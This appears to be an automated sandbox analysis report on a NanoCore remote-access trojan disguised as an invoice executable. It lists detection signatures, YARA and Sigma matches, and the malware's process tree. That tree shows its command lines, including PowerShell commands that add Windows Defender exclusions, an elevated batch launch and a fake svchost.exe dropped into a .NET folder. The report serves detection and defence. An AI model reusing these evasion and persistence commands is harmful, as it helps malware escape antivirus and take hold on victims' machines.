Analysis Report CN-Invoice-XXXXX9808-19011143287994.exe

Overview

General Information

Sample Name: CN-Invoice-XXXXX9808-19011143287994.exe
Analysis ID: 358392
MD5: a0f103f98ede4da72e178ee05dabe1e1
SHA1: 320dea63289cad5685cfba395d673142f85fc6ff
SHA256: 6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
Tags: NanoCore

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287994.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
    • powershell.exe (PID: 1472 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5008 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 4824 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 3400 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5856 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 816 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 6252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 4792 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4424 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4184 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 6776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6980 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6336 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 5588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5604 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5820 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • svchost.exe (PID: 6176 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 6224 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6292 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6408 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 4732 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6264 cmdline: 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: NanoCore, Description: unknown, Author: Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x1045d:$x1: NanoCore.ClientPluginHost
  • 0x4327d:$x1: NanoCore.ClientPluginHost
  • 0x75e9d:$x1: NanoCore.ClientPluginHost
  • 0x1049a:$x2: IClientNetworkHost
  • 0x432ba:$x2: IClientNetworkHost
  • 0x75eda:$x2: IClientNetworkHost
  • 0x13fcd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x46ded:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x79a0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Unpacked PEs

Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0x28279:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
  • 0x282a6:$x2: IClientNetworkHost
Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x28279:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0x29354:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
  • 0x28293:$s5: IClientLoggingHost
Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0xe105:$x1: NanoCore Client.exe
  • 0xe38d:$x2: NanoCore.ClientPluginHost
  • 0xf9c6:$s1: PluginCommand
  • 0xf9ba:$s2: FileCommand
  • 0x1086b:$s3: PipeExists
  • 0x16622:$s4: PipeCreated
  • 0xe3b7:$s5: IClientLoggingHost

Sigma Overview

System Summary:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 4228, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss; Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: coroloboxorozor.com, VirusTotal: Detection: 15%
Multi AV Scanner detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: CN-Invoice-XXXXX9808-19011143287994.exe, VirusTotal: Detection: 29%
Source: CN-Invoice-XXXXX9808-19011143287994.exe, ReversingLabs: Detection: 27%
Yara detected Nanocore RAT
Source: Yara match, file source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
Source: Yara match, file source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
Source: Yara match, file source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
Source: Yara match, file source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: CN-Invoice-XXXXX9808-19011143287994.exe, Joe Sandbox ML: detected
Source: 13.2.CasPol.exe.51c0000.7.unpack, Avira: Label: TR/NanoCore.fadte

Compliance:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: CN-Invoice-XXXXX9808-19011143287994.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
